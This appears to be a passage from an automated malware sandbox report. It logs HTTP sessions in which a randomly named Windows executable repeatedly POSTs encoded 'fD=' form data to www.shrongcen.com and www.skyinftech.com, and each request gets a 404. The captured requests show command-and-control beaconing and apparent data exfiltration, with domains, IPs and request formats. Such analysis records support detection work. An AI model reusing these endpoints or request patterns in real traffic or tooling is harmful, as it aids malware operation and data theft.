27	192.168.2.5	49738	123.58.214.101	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:05:32.028023958 CEST	1749	OUT	POST /5965/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.shrongcen.com Content-Length: 1239 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.shrongcen.com Referer: http://www.shrongcen.com/5965/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 77 68 34 34 41 45 6e 30 4a 56 71 4d 50 56 6e 66 69 72 44 63 46 34 49 37 6f 48 76 77 39 5a 47 6c 4b 78 7a 77 62 6f 50 49 2b 37 6d 53 62 65 77 51 4b 73 33 70 41 44 75 31 36 62 32 36 34 47 70 62 79 61 64 50 68 68 71 4e 5a 37 39 76 72 36 6e 6a 56 64 4e 48 56 39 5a 4e 65 44 39 50 35 74 34 38 45 62 4c 52 32 6d 43 4f 4c 58 52 70 5a 37 78 4a 6b 58 6f 45 6f 43 57 69 42 41 31 36 45 49 69 38 58 73 69 6b 76 34 51 57 39 4e 53 31 6c 4d 39 4b 58 35 49 43 4e 56 69 6f 72 6b 44 51 51 48 51 45 2f 4d 4a 74 31 6f 56 55 30 74 33 75 6f 39 43 31 71 7a 52 36 76 2f 61 50 49 41 4e 4d 68 52 55 6b 67 47 56 30 50 6f 75 6b 30 58 72 4b 73 70 62 6e 55 2b 35 6c 50 4a 35 63 49 51 4e 30 67 66 41 69 37 6c 36 2b 7a 51 30 42 66 72 69 4d 63 44 42 7a 68 6f 72 2f 55 6d 5a 36 32 52 38 69 6d 69 69 42 38 45 43 36 4b 45 4a 44 65 57 48 54 5a 77 2b 6d 31 6c 4e 57 44 6f 7a 32 6b 76 62 47 36 37 5a 63 44 61 43 72 79 32 66 5a 66 64 41 57 56 7a 59 61 43 34 64 6c 34 69 37 34 56 55 37 78 72 4e 77 6c 68 69 49 4f 4b 77 5a 57 42 46 38 41 44 6f 57 [TRUNCATED] Data Ascii: fD=wh44AEn0JVqMPVnfirDcF4I7oHvw9ZGlKxzwboPI+7mSbewQKs3pADu16b264GpbyadPhhqNZ79vr6njVdNHV9ZNeD9P5t48EbLR2mCOLXRpZ7xJkXoEoCWiBA16EIi8Xsikv4QW9NS1lM9KX5ICNViorkDQQHQE/MJt1oVU0t3uo9C1qzR6v/aPIANMhRUkgGV0Pouk0XrKspbnU+5lPJ5cIQN0gfAi7l6+zQ0BfriMcDBzhor/UmZ62R8imiiB8EC6KEJDeWHTZw+m1lNWDoz2kvbG67ZcDaCry2fZfdAWVzYaC4dl4i74VU7xrNwlhiIOKwZWBF8ADoWRPyjFtKgOd2+B9MuK4s5P+6ev9Pnu0an/UhSfgnk7zcxO0r8nus+bCzOIQX2J7Nes8w51eGqr6jW3ycoOgCoMyKsidAg3JhGIhubDlkx7zcSuWoiu69WuQBMGFFI7tOmZZrbbmpD8lxPN7DMKSuBycBZnQ+RtT2L2ddVS1hCAnoafmoCOmv8EVQLijqs7Jq/ynZCTFjG8h6lym5t3D8EHGI+dFkuCyrzznqf3smYn33SKbWKnfHutY68pcd0/EaZ6s6MoZU6do41T2QcGG9Vtn2//yCLrhmzAtlhQnvhzqC2owEf0LYLiQBZC1fJI9Ise2y2J+54lxwnLzuvELy+4Kzf3QD6UjC+HQMeUD/Xux9F4UUZtLblI6dctYu+fNY2uLv1kUfTQN+JoGqegU8dj81xqlvE0/7QXM+Zc4HJH1ZiADWN2qwcvJDiCCxrIJ7s3Zj3OVp+VwByqhyJNeo/oo5dsAJ4Amw1tArnFyXXOOicNdORuD6j1HKdq116L37Xe/sbFSz0X219YltfS/vpKu3+QG2MVQ2dDR4EE+ey6/3+xJZAlgYzf0t4rBnlAG1mYKzNnuc9T0T12kut/jSorggIOBLtgbUgGmxsZ9YdDrw3PuzAJLv1QmjSHiuYQZx7JB9z5Iiv3sTmNRzc9d0GQmID5Lnb8+cKBE [TRUNCATED]
Jun 13, 2024 11:05:32.984710932 CEST	318	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Thu, 13 Jun 2024 09:05:32 GMT Content-Type: text/html; charset=utf-8 Content-Length: 153 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49739	123.58.214.101	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:05:34.560017109 CEST	452	OUT	GET /5965/?fD=9jQYDwKIZi6/W0GvqqOWctdn1nDe86qQU37QFI3e35aKJbsuGODGFib0m7CCxXxx0blg9Tj0Vv9f5L3iX8JxT+4MBVsytoUBFOmu7GzeNBgPNO5fqFAxhyq0WiRZHbK4BA==&j0=vTcl_2X8QJ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.shrongcen.com Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Jun 13, 2024 11:05:35.516942024 CEST	318	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Thu, 13 Jun 2024 09:05:35 GMT Content-Type: text/html; charset=utf-8 Content-Length: 153 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49740	103.138.88.32	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:05:41.498164892 CEST	715	OUT	POST /gwqo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.skyinftech.com Content-Length: 203 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.skyinftech.com Referer: http://www.skyinftech.com/gwqo/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 6c 6d 76 39 74 66 31 6a 43 58 51 47 6c 2b 56 72 53 57 70 5a 65 6c 57 32 62 53 6b 57 75 6e 75 76 48 63 34 68 56 6c 53 37 63 72 59 62 70 58 4f 61 2b 76 64 57 74 4d 7a 67 53 77 30 46 54 71 6b 77 69 4a 47 33 31 2f 6c 41 46 62 66 4d 2f 46 57 79 54 76 78 55 68 6a 53 41 64 32 50 34 73 47 37 6a 52 4d 53 76 49 2f 75 46 30 2b 72 55 57 74 64 49 71 44 54 6e 70 68 2b 30 58 73 6d 34 58 4d 65 54 34 78 49 50 6f 37 31 31 6b 42 68 41 35 79 51 6b 41 54 41 62 38 35 6c 36 41 2b 51 31 37 49 53 49 5a 73 65 4e 31 66 46 69 38 4e 4c 65 35 32 4c 31 57 44 53 50 75 6d 6b 63 56 55 52 45 57 2f 78 49 6a 65 31 6e 4b 4f 59 3d Data Ascii: fD=lmv9tf1jCXQGl+VrSWpZelW2bSkWunuvHc4hVlS7crYbpXOa+vdWtMzgSw0FTqkwiJG31/lAFbfM/FWyTvxUhjSAd2P4sG7jRMSvI/uF0+rUWtdIqDTnph+0Xsm4XMeT4xIPo711kBhA5yQkATAb85l6A+Q17ISIZseN1fFi8NLe52L1WDSPumkcVUREW/xIje1nKOY=
Jun 13, 2024 11:05:42.512474060 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1238 date: Thu, 13 Jun 2024 09:05:40 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
Jun 13, 2024 11:05:42.512722015 CEST	240	IN	Data Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49741	103.138.88.32	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:05:44.116477966 CEST	735	OUT	POST /gwqo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.skyinftech.com Content-Length: 223 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.skyinftech.com Referer: http://www.skyinftech.com/gwqo/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 6c 6d 76 39 74 66 31 6a 43 58 51 47 6a 65 6c 72 51 31 52 5a 56 6c 57 78 46 43 6b 57 6b 48 76 6d 48 63 45 68 56 6b 47 72 63 59 38 62 6f 33 2b 61 2f 74 31 57 67 73 7a 67 41 51 30 41 58 71 6b 37 69 4a 43 5a 31 2f 5a 41 46 62 4c 4d 2f 45 6d 79 54 63 70 62 75 54 53 34 56 57 50 36 6f 47 37 6a 52 4d 53 76 49 2f 71 38 30 2b 7a 55 56 64 74 49 72 69 54 6b 6e 42 2b 7a 64 4d 6d 34 41 63 65 58 34 78 49 39 6f 36 5a 54 6b 48 74 41 35 32 55 6b 52 68 34 59 31 35 6c 38 66 75 52 34 33 74 33 32 41 61 4b 78 35 65 67 7a 6a 64 37 66 38 41 6d 66 4d 68 61 6e 39 47 49 6b 46 48 5a 7a 48 50 51 68 35 39 6c 58 55 5a 4e 47 44 4c 77 48 66 34 49 67 7a 62 48 76 6c 39 78 59 55 69 4c 49 Data Ascii: fD=lmv9tf1jCXQGjelrQ1RZVlWxFCkWkHvmHcEhVkGrcY8bo3+a/t1WgszgAQ0AXqk7iJCZ1/ZAFbLM/EmyTcpbuTS4VWP6oG7jRMSvI/q80+zUVdtIriTknB+zdMm4AceX4xI9o6ZTkHtA52UkRh4Y15l8fuR43t32AaKx5egzjd7f8AmfMhan9GIkFHZzHPQh59lXUZNGDLwHf4IgzbHvl9xYUiLI
Jun 13, 2024 11:05:45.992114067 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1238 date: Thu, 13 Jun 2024 09:05:42 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
Jun 13, 2024 11:05:45.992177010 CEST	240	IN	Data Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
Jun 13, 2024 11:05:45.992208004 CEST	240	IN	Data Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
Jun 13, 2024 11:05:45.992301941 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1238 date: Thu, 13 Jun 2024 09:05:42 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
Jun 13, 2024 11:05:45.992342949 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1238 date: Thu, 13 Jun 2024 09:05:42 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49742	103.138.88.32	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:05:46.649065018 CEST	1752	OUT	POST /gwqo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.skyinftech.com Content-Length: 1239 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.skyinftech.com Referer: http://www.skyinftech.com/gwqo/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 6c 6d 76 39 74 66 31 6a 43 58 51 47 6a 65 6c 72 51 31 52 5a 56 6c 57 78 46 43 6b 57 6b 48 76 6d 48 63 45 68 56 6b 47 72 63 59 30 62 70 45 47 61 2b 4d 31 57 68 73 7a 67 44 51 30 42 58 71 6b 63 69 4e 57 56 31 2f 56 51 46 5a 7a 4d 35 57 75 79 61 4e 70 62 35 44 53 34 5a 32 50 35 73 47 37 79 52 4d 44 6f 49 2f 36 38 30 2b 7a 55 56 65 31 49 73 7a 54 6b 33 78 2b 30 58 73 6d 4f 58 4d 65 7a 34 78 51 48 6f 36 63 75 6b 33 4e 41 34 57 45 6b 54 79 41 59 6f 4a 6c 2b 65 75 51 72 33 74 7a 54 41 65 72 64 35 65 46 6b 6a 66 62 66 2b 33 6a 62 49 56 4f 74 67 55 30 56 44 31 41 58 66 34 51 59 78 38 78 66 55 34 78 58 41 4a 59 78 58 63 77 65 79 49 33 71 78 70 64 65 54 53 36 68 32 77 46 6e 75 6c 71 78 6c 54 2b 42 45 58 31 69 56 6f 79 63 51 4c 44 4b 41 72 71 30 33 44 52 30 62 31 4d 79 73 62 75 69 41 4f 45 38 2b 45 5a 67 70 58 72 48 47 70 4f 72 76 43 41 4c 37 6b 73 39 79 62 48 2f 30 42 63 74 4d 37 67 34 41 61 34 6d 38 6c 37 70 6f 4b 63 39 52 41 79 63 59 50 43 6a 73 53 6f 52 6f 52 69 74 39 65 4c 51 66 79 72 69 70 30 39 [TRUNCATED] Data Ascii: fD=lmv9tf1jCXQGjelrQ1RZVlWxFCkWkHvmHcEhVkGrcY0bpEGa+M1WhszgDQ0BXqkciNWV1/VQFZzM5WuyaNpb5DS4Z2P5sG7yRMDoI/680+zUVe1IszTk3x+0XsmOXMez4xQHo6cuk3NA4WEkTyAYoJl+euQr3tzTAerd5eFkjfbf+3jbIVOtgU0VD1AXf4QYx8xfU4xXAJYxXcweyI3qxpdeTS6h2wFnulqxlT+BEX1iVoycQLDKArq03DR0b1MysbuiAOE8+EZgpXrHGpOrvCAL7ks9ybH/0BctM7g4Aa4m8l7poKc9RAycYPCjsSoRoRit9eLQfyrip09BLFO8fCHL25V3eksn8w5zB8UAxd3kyQIPJlEG5iF1q3nDFwFK0l/juPxP/jsOHw9vq8Q48EzsOZ6Ruv1xtzcCJmsrFICsL4onIWZtN2+FoQWTdaVtxZvdXsJfmcN31ozmRo2GFKbnjwApBFWQXHq41KGRmpFUWO26i1NUbyRvOyzBMyS9K4EGeH++F44TaJ2Tmp453RPcFryj20Aiy4FjMW6yGcS4F2okblX+j7uwWQDEhG0054ku6OEzDNOWFS5gJv/bfNwfDv2CAaNVwKbvrQYXQsVZwLt21IPQX5C7bbPAt//OjT4thJ6ERup0CYs8iRg3vDsQDUnjNEdJFchT9Z9M/uSI2oJT//xp/b3oK/IurCJy9ttZdqtZYh530MlhPF7A9Zp+aIiNy21YC3P8bfHn4gXcGWdoUrHC0hmlmMagZduCAIVEKjEL2QsnBpp77UMQY+oTp5TVjcJauIWjK+ojMk2IoF1p7oAzltND4iMX5nf3vdv6p0RArhVG9GpyE38MUqoGMmEqw2zQ6XbBpS+GlIhmS6mHMIXzNEmMG5pp2IzlwrITGJXSBzA5LG8YTsXcNHWfFxCbb+Q7+cNIawWkI9lvtNOEBywdp+x7t9DIi2s16g4JzCv50O9jiaEGcpT2LWvaEwYfki5gEU3zhhtxUrK7EMpk4 [TRUNCATED]
